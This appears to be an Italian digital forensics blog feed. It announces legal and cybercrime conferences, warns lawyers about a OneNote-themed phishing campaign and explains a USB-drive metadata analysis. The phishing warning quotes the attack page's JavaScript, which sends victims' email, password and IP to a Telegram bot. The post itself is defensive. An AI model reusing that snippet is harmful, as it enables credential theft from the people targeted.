L’intelligenza artificiale e l’Avvocatura sono un binomio molto discusso, in particolare negli ultimi mesi durante i quali leggiamo notizie di atti che paiono essere stati predisposti con o dall’IA.
Gggi pomeriggio in Maxi Aula 1 del Tribunale di Torino se ne parlerà al convegno “Intelligenza Artificiale – La visione dell’avvocatura torinese“, organizzato da Fondazione dell’Avvocatura Torinese Fulvio Croce e il gruppo Il Sole 24 Ore, parte del ciclo di incontri “Temi d’Impresa” – XII° incontro.
La direzione scientifica è dell’Avv. Riccardo Salomone, i saluti dell’Avv. Avv. Enrico Maggiora, Presidente Fondazione Fulvio Croce, la presentazione brevIArio sarà condotta dagli Avv.ti Alessio Chiabotto, Vittoria Diotallevi, Carlo Negro e Paolo Pisano – Commissione IA Ordine COA Torino.
Il Prof. Avv. Giovanni Maria Riccio – Professore Ordinario di Diritto Privato – Università di Salerno – terrà una relazione su AIAct: quadro normativo attuale.
Seguiranno gli interventi sugli aspetti tecnici con:
“Profili GDPR e aspetti deontologici”, Avv. Cristiano Michela – Consigliere Ordine Avvocati Torino;
“AI e responsabilità in ambiti specifici: l’utilizzo in campo giudiziario”, Prof. Avv. Prof. Avv. Marco Martorana – Professore a contratto in diritto della privacy – Universitas Mercatorum.
Conclude l’incontro la parte pratica, introdotta dal Dr. Paolo Roccia – Il Sole24 ORE – e un intervento sugli strumenti per i professionisti, tenuto dall’Avv. Alberto Bozzo – Formatore IlSole24ORE.
La locandina dell’evento su Intelligenza Artificiale e Avvocatura è disponibile e visionabile al seguente link.
L’Associazione dei Consumatori CODACONS Latina, per il tramite del Presidente Provinciale Avv. Antonio Formiconi, in collaborazione con il Consiglio dell’Ordine degli Avvocati e lo Studio Legale Di Resta Lawyers, organizza un importante convegno dedicato alla tutela dei risparmiatori e dei correntisti dal titolo “Le responsabilità degli intermediari finanziarie degli istituti di credito: risparmio tradito e frodi telematiche“.
IL convegno si terrà lunedì 23 marzo 2026, alle ore 15:00 presso il Circolo Cittadino di Latina – Piazza del Popolo, 1, l’ingresso è libero ma i posti sono limitati.
L’iniziativa nasce con l’obiettivo di offrire strumenti concreti per comprendere i rischi legati agli investimenti finanziari e alla gestione dei conti correnti, con particolare attenzione ai fenomeni sempre più diffusi delle frodi bancarie e digitali.
A chi è rivolto il convegno sulla responsabilità degli intermediari finanziari e le frodi telematiche
L’evento sul risparmio tradito e le frodi telematiche in ambito bancario è rivolto a:
cittadini e consumatori
risparmiatori e investitori
professionisti interessati alla materia
Un’occasione utile per acquisire consapevolezza sui propri diritti e sulle tutele previste dall’ordinamento.
I temi trattati durante il convegno sulle frodi informatiche e bancarie
Durante il convegno che si terrà a Latina (Roma) sugli intermediari finanziari verranno approfonditi, con taglio pratico e giuridico:
la responsabilità degli intermediari finanziari e degli istituti di credito
la tutela del risparmio e i casi di “risparmio tradito”
gli obblighi informativi previsti dalla normativa MIFID
le frodi bancarie e informatiche, tra cui phishing, chiamate fraudolente (ID spoofing), SIM swap, investimenti su piattaforme digitali e criptovalute
Un focus particolare sarà dedicato agli strumenti di difesa e alle azioni concrete a tutela dei cittadini.
Programma dell’evento e relatori del convegno sulle truffe bancarie e reati finanziari
Al Convegno sulle responsabilità degli intermediari finanziari in caso di truffe e frodi interverranno:
Avv. Giovanni Grassucci – Foro di Latina – docente universitario in ambito protezione dei dati personali
Moderatore: Avv. Giovanni Lauretti – Presidente dell’Ordine degli Avvocati di Latina
Saluti istituzionali: Avv. Antonio Formiconi – Foro di Latina – Presidente di Codacons Latina
Intervento Introduttivo
Avv. Jacopo Barcati – Foro di Treviso – Avvocato Of Counsel Studio Legale Di Resta Lawyers: La tutela del risparmiatore tradito e l’inosservanza degli obblighi in base alla normativa MIFID
Avv. Veronica Miccinilli – Foro di Latina – Codacons Nazionale: Casi di successo per il risparmiatore e il ruolo di Codacons
dott. Valentino Vecchi – Commercialista e specialista in contenzioso bancario – Ordine commercialisti di Napoli: Verifiche di appropriatezza e di adeguatezza a tutela del risparmiatore nell’ambito dei rapporti bancari
Avv. Fabio Di Resta – Foro di Latina – DPO e Professore universitario a contratto Cybersecurity e protezione dei dati: La tutela del correntista e del risparmiatore vittima frode di informatica bancaria e finanziaria
dott. Paolo Dal Checco – Esperto di informatica forense – Professore universitario a contratto corso di sicurezza informatica – CTU presso il Tribunale di Torino (intervento da remoto): Le investigazioni informatiche forensi a tutela dei correntisti e degli investitori vittime di frodi bancarie e delle piattaforme di criptovalute.
Chiude l’evento sulle frodi informatiche e telematiche in ambito bancario una sessione di domande e risposte.
Il talk sulle investigazioni informatiche forensi in ambito di frodi bancarie
Nel mio talk parlerò di come si svolgono, in concreto, le attività di perizia informatica forense nei casi di frodi bancarie e truffe legate alle piattaforme di criptovalute, con un taglio pratico e operativo. Partendo dai principali schemi di attacco (phishing, spoofing, SIM swap e falsi investimenti online ma anche social engineering, man in the mail e CEO Fraud) illustrerò quali elementi probatori possono essere raccolti sin dalle prime fasi e perché la tempestività è determinante per la riuscita delle indagini.
Analizzerò il ruolo della vittima, evidenziando cosa può e deve fare immediatamente per preservare le prove digitali (chat, email, log di accesso, dispositivi, eventuali malware) e quali richieste avanzare agli istituti bancari per ottenere dati tecnici fondamentali (indirizzi IP, sistemi di autenticazione utilizzati, tracciature delle operazioni).
Affronterò inoltre le peculiarità investigative delle frodi in ambito crypto, soffermandomi sulla raccolta di indirizzi wallet, sull’analisi delle transazioni e sui limiti e le opportunità offerte dalla tracciabilità della blockchain.
Infine, offrirò una panoramica delle attività della Polizia Giudiziaria, illustrando quali dati possono essere acquisiti (bancari, telefonici e telematici) e quali sono le principali criticità investigative, con l’obiettivo di fornire ai partecipanti strumenti concreti per comprendere come si costruisce, passo dopo passo, un’indagine efficace in questo ambito.
Informazioni utili
Ingresso libero (posti limitati)
Accreditamento in corso per crediti formativi avvocati
La brochure dell’evento sulle responsabilità degli intermediari finanziarie degli istituti di credito: risparmio tradito e frodi telematiche è disponibile e scaricabile dal seguente link.
Venerdì 12 dicembre 2025 si terrà, a Roma, presso il Centro Congressi Frentani Srl – in Via dei Frentani, 4, a pochi passi dalla Stazione Termini di Roma – il seminario “IISFA FORUM 2025 – Cybercrime, Artificial Intelligence & Digital Forensics” durante il quale si succederanno interventi su Cybercrime, Artificial Intelligence & Digital Forensics tenuti da esperti della materia.
La conferenza “IISFA Forum 2025 – Cybercrime, Artificial Intelligence e Digital Forensics”, organizzata dall’associazione IISFA, riunisce le principali istituzioni italiane impegnate nella sicurezza cibernetica per analizzare l’evoluzione delle minacce digitali e il ruolo crescente dell’intelligenza artificiale nelle attività investigative.
La mattinata è dedicata ai trend nazionali sui cyber attacchi, alle nuove forme di cybercrime e all’impatto delle tecnologie emergenti sulle indagini, grazie agli interventi di rappresentanti dell’Agenzia per la Cybersicurezza Nazionale, della Polizia Postale, dei Carabinieri, della Guardia di Finanza e di esperti del settore legale e forense. Due tavole rotonde approfondiscono i temi etici legati all’IA e la relazione tra criminalità informatica, social media e comunicazione giornalistica.
Nel pomeriggio, la conferenza entra nel vivo delle attività tecniche, con interventi dedicati allo spyhunting su dispositivi mobili, alle investigazioni digitali in ambito aziendale, ai nuovi reati informatici legati alla cybersecurity e all’IA, fino alle sfide della post-quantum security e all’evoluzione dei ransomware.
La giornata si conclude con un coinvolgente cyber forensics game, una simulazione pratica su un caso reale di analisi forense, che permette al pubblico di confrontarsi direttamente con metodologie e tecniche operative utilizzate nei moderni scenari investigativi.
Spyhunting su smartphone: tecniche, strumenti e metodologie di rilevamento dei software spia
Avrò l’occasione di essere tra i relatori, nel pomeriggio, con un intervento intitolato “Spyhunting sui sistemi cellulari: lo stato dell’arte”, durante il quale parlerò delle tecnologie attualmente utilizzate per verificare la presenza di malware, captatori, spy software, trojan sugli smartphone iOS e Android.
In questi ultimi mesi sono emersi diversi casi di smartphone intercettati tramite software spia – o captatori – che hanno alzato la soglia di attenzione e la necessità di poter disporre di metodologie e strumenti per capire se un telefono è sotto controllo tramite spysoftware.
Durante il talk avrò l’occasione di presentare lo stato dell’arte nelle tecniche e strumenti di spyhunting, cioè di ricerca di software spia, captatori, trojan e malware finalizzati a intercettare le comunicazioni delle vittime, captare foto, video, messaggi Whatsapp, Signal, Telegram o iMessage.
Vedremo infatti in breve le principali tecniche di individuazione di software spia e attività malevole sui sistemi cellulari, le differenze tra le varie modalità di copia forense (logical, advanced logical, Full File System o FFS, physical) nelle possibilità di rilevamento dei malware, gli strumenti di analisi forense utilizzati oggi per l’attività di spyhunting su smartphone, gli strumenti di estrazione dati, analisi e malware detection come Mobile Verification Toolkit (MVT), Android Quick Forensics, parser per Sysdiagnose, le potenzialità della intelligenza artificiale nel rilevamento di malware e spy software; l’utilizzo dei log e dei dump (sysdiagnose, unified logs, shutdown.log, event log, crash log, bug report, logcat, tombstone, ANR, etc…) per rinvenire tracce delle infezioni da malware sui disposivi, l’analisi del traffico di rete come strumento di rilevamento di attività malevola di spy software su smartphone e alcuni casi d’uso e scenari investigativi in cui l’analisi forense mobile è centrale per la ricostruzione dei fatti.
La giornata sarà ricca d’interventi di altissimo rilievo, con relatori istituzionali, militari, con il seguente programma.
Programma della conferenza IISFA Forum 2025 a Roma
Il programma della giornata si snoda in una mattinata con saluti d’indirizzo e due tavole rotonde, mentre il pomeriggio si snoderà tra interventi focalizzati su specifici argomenti d’informatica forense, tutela aziendale, OSINT, reati informatici, intelligenza artificiale, post quantum security ed analisi forense con il cyberforensics game conclusivo.
Ore 9:30 – Saluti di indirizzo
Gerardo Costabile – Presidente IISFA
Nunzia Ciardi – Vicedirettore Agenzia per la Cybersicurezza Nazionale
Amm. Gianluca Galasso – Direttore del Servizio Operazioni e gestione delle crisi cyber/CSIRT Italia – Agenzia per la Cybersicurezza Nazionale Trend nazionale dei cyber attacchi: lo stato dell’arte in Italia
Ivano Gabrielli – Direttore del Servizio Polizia Postale e per la Sicurezza Cibernetica Cybercrime e nuovi trend
Gen. Vincenzo Molinese – Comandante ROS Carabinieri Intelligenza Artificiale e attività investigative
Gen. Antonio Mancazzo – Comandante del Nucleo Speciale Tutela Privacy e Frodi Tecnologiche della Guardia di Finanza Cybercrime e follow the money: evoluzione e nuovi scenari
Stefano Mele – Partner, Head of Cybersecurity & Space Law Department, Gianni & Origoni Anatomia di un attacco ransomware: ricatti, psicologia e cryptoasset in attesa di una strategia italiana
Tavola rotonda Intelligenza artificiale, etica e informatica forense
Partecipano:
Eugenio Albamonte (Direzione Nazionale Antimafia)
Giuseppe Corasaniti (Professore ordinario UniMercatorum)
Paolo Galdieri (Avvocato)
Mattia Epifani (Presidente ONIF)
Marco Calonzi (Direttivo IISFA)
Gianluca Boccacci (Presidente Cyber Actors)
Tavola rotonda Cybercrime, social media e comunicazione giornalistica tra forma e sostanza
Partecipano:
Domenico Colotta (Assocomunicatori)
Arturo di Corinto (Giornalista professionista, Agenzia Cybersicurezza Nazionale)
Luigi Garofalo (Direttore responsabile Cybersecurity Italia)
Michela Carloni Gammon, Direttore Everbridge – Veronica Vacchi, Dinova Tutela aziendale, media investigation e open source intelligence
Stefano Aterno (Studio E-lex) I nuovi reati informatici nella cybersecurity e nell’intelligenza artificiale
Prof. Aniello Castiglione – Università di Salerno Post quantum security, evoluzione dei ransomware e complessità investigative
Cosimo de Pinto (Direttivo IISFA) & Salvatore Filograno (Direttivo IISFA) Cyber forensics game: simulazione con l’intervento del pubblico su un caso reale di analisi forense
Iscrizioni al seminario IISFA Forum 2025 a Roma
L’evento IISFA Forum 2025 a Roma è gratuito e aperto a tutti, non soltanto ai soci IISFA: per partecipare è sufficiente registrarsi online su Eventbrite e presentarsi venerdì 12 dicembre 2025 presso il Centro Congressi Frentani Srl alle ore 9:30 per l’inizio dei lavori.
I posti sono limitati ma vi sono ancora alcune disponibilità, raccomandiamo di affrettarvi con la registrazione e di cancellare l’adesione in caso d’impossibilità di partecipare all’evento IISFA a Roma.
Locandina dell’evento IISFA Forum 2025 a Roma
La locandina in PDF dell’evento IISFA Forum 2025 a Roma è disponibile qui di seguito, visionabile online o scaricabile direttamente sul proprio PC o Smartphone.
Un articolo che non parla d’informatica forense, come di consueto, ma è da leggere con attenzione e far girare in particolare tra gli avvocati: è importante saper riconoscere il phishing che sta colpendo gli studi legali italiani (e non solo) che porta a potenziali databreach a catena, dato che chi subisce l’attacco poi diventa vettore – verso i suoi contatti – di nuovi attacchi.
In questi giorni arrivano infatti agli avvocati email da parte di colleghi (ma anche clienti o collaboratori) che citano un documento di “Pagamento fattura” non allegato ma condiviso tramite OneNote, come mostrato nelle immagini allegate al post.
La mail ha come oggetto una frase tipo: “Studio Legale Associato XYZ ha condiviso la file Elementi condivisi il giorno 06-11-2025′ con te”.
Cliccando sul link si apre una pagina che indica che il documento contenente la fattura è crittografato ed è necessario loggarsi su Microsoft OneNote per accedervi:
"Avv. ABC - STUDIO LEGALE ASSOCIATO XYZ ho condiviso un nuovo documento con te
Pagamenti delle fattura.pdf(601 KB)
Cliccando sul link “Visualizzare il documento condiviso” si giunge a una pagina con diversi login.
E’ possibile inserire il proprio login con username e password per ogni tipo di account di posta elettronica che si possiede, partendo dai principali come Office365, Outlook, Rackspace, Aruba, PEC o anche altri account:
Accedi alla tua e-mail per visualizzare il documento condiviso.
Accedi qui sotto.
Accedi con Office365
Accedi con Outlook
Accedi con Rackspace
Accedi con Aruba Mail
Accedi con PEC
Accedi con Altra Posta
Inserendo le proprie credenziali ai vari link, queste vengono inviate agli attaccanti tramite una chiamata API a un bot Telegram:
forma.addEventListener("submit", e =>{ e.preventDefault(); let email = document.querySelector('#e-mail').value let pwd = document.querySelector('#pwd').value let ips = document.querySelector('#ipaddress').value fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=Email:${email}=Password:=${pwd}=IP:=${ips}`, { method: "GET" }).then(success => { window.location.replace("https://www.onenote.com/"); }, error => { alert("Message not sent") console.log(error) })
In sostanza, gli attaccanti, per scaricare il file chiedono d’inserire su un finto sito Microsoft username e password di posta (Office365, Outlook, Rackspace, Aruba S.p.A., PEC o anche qualunque altra) ma ovviamente una volta loggati invece di mostrare la fattura:
1) gli attaccanti entrano nell’account di posta dello Studio;
2) se hanno tempo e voglia scaricano i messaggi e gli allegati;
3) scaricano la rubrica e inviano a tutti i contatti la stessa mail ricevuta sperando che anche loro si facciano trarre in inganno..
Le email che arrivano sono originali e autentiche, inviate dal vero account del collega avvocato, non sono spoofing e tendono a passare i controlli antispam, quindi l’unica prevenzione è non inserire la password al link con il documento condiviso. Se cliccate su link e andate avanti senza inserire credenziali non succede nulla.
Se avete già inserito user/password, gli attaccanti stanno potenzialmente scaricandosi i vostri messaggi, la rubrica e inviando ai vostri contatti lo stesso messaggio: cambiate subito password, loggatevi sulla webmail per chiudere eventuali altre sessioni aperte, attivate 2FA se già non lo avete, valutate se informare i contatti di non aprire link da voi ricevuti, se volete capire cosa hanno fatto gli attaccanti nel vostro account scaricate/chiedete i file di log del provider.
Se avete ricevuto mail simili a quelle allegate al post quindi cancellatele anche se provengono da colleghi oppure se avete voglia inviatemi il file EML che ne sto collezionando diversi per analizzare come il phishing sta diffondendosi tra i professionisti e quali tecniche utilizzano gli attaccanti per rendere credibile il phishing.
Martedì 4 novembre 2025 è andato in onda il servizio de Le Iene dove, come perito forense, ho aiutato la Iena Filippo Roma a trovare riferimenti a potenziali autori all’interno di una pendrive USB contenente un documento Word.
Il servizio de Le Iene parla di una questione nella quale non mi addentro, poiché mi è stato semplicemente chiesto se fosse possibile trovare l’autore, il proprietario o l’utilizzatore di una pendrive USB, in particolare basandomi su di un documento Microsoft Office Word in essa contenuto.
L’attività di perizia informatica è iniziata con la realizzazione di una copia forense della pendrive USB – così da cristallizzarne e preservarne il contenuto all’interno di una immagine forense con estensione EWF, in modo da poterla successivamente analizzare.
L’analisi forense svolta come perito informatico per Le Iene – in particolare per Filippo Roma e l’autore del servizio TV – è stata eseguita tramite il software X-Ways Forensics, con il quale ho eseguito carving, recupero dati e ricostruzione del filesystem, inclusi file cancellati e relativi metadati EXIF di immagini, OOXML di file Word e XMP di file PDF.
Il software XWF – X-Ways Forensics – permette a chi opera come consulente informatico forense di eseguire attività di analisi e perizia informatica su immagini forensi al fine di ricostruire file eliminati e categorizzare metadati ed evidenze digitali
Come contro-verifica – in ambito informatica forense è sempre importante l’attività di cross examination – ho utilizzato anche il noto software open source Exiftool, così da poter confermare le risultanze ottenute mediante il tool forense XWF e produrre quindi una valutazione circa l’attribuzione del file.
Nella pendrive erano presenti ulteriori file di tipo “.Trashes”, “.TemporaryItems”, “.Spotlight-V100” con i subfolder “Store-V2” e all’interno i vari journal e index, ma in nessuno di tali artefatti erano contenute indicazioni circa l’attribuzione della pendrive o meglio, si sono trovati gli stessi riscontri presenti nel file Word oggetto di analisi.
Dal punto di vista informatico forense, la presenza di uno specifico nominativo nel campo “Creator/Author” o “Last Modified By/Last Saved By” non indica necessariamente l’autore del documento o dell’ultima modifica ma il nominativo con cui è stato configurato il software utilizzato per generare il documento Word.
In genere, quindi, quando si rileva un nominativo nel campo autore del documento o dell’ultima modifica al documento in un file Word – ma anche Excel o Powerpoint, oltre a PDF o eventuali file JPG, multimediali, etc… – possono verificarsi tre situazioni:
Il nominativo presente nei dati EXIF/XMP/OOXML può effettivamente essere l’autore del documento;
Lo user indicato nei metadati del file Word può essere quello con cui è stato configurato il sistema utilizzato per creare o modificare il file ma il file non è stato creato/modificato da tale soggetto;
Lo username reperibile nei meta dati può essere stato inserito apposta nel file da terzi per forzare l’attribuzione di un file a un soggetto (es. per attribuirgli la creazione/modifica del file).
Ovviamente dall’analisi forense di un solo file non è possibile distinguere con una perizia informatica in quale casistica di quelle riportate sopra rientri, se non esaminando ulteriori elementi (es. altri file presenti sul dispositivo, percorsi/path del filesystem lasciati nei file, negli indici o nei dati temporanei, etc…) e quindi non si possono fare ulteriori valutazioni.
Proprio per questo motivo è importante procedere con la massima cautela quando si ricavano informazioni dai metadati dei file, valutando le possibili interpretazioni in base a ulteriori elementi, anche investigativi, che possano confermare o meno l’attendibilità dell’attribuzione.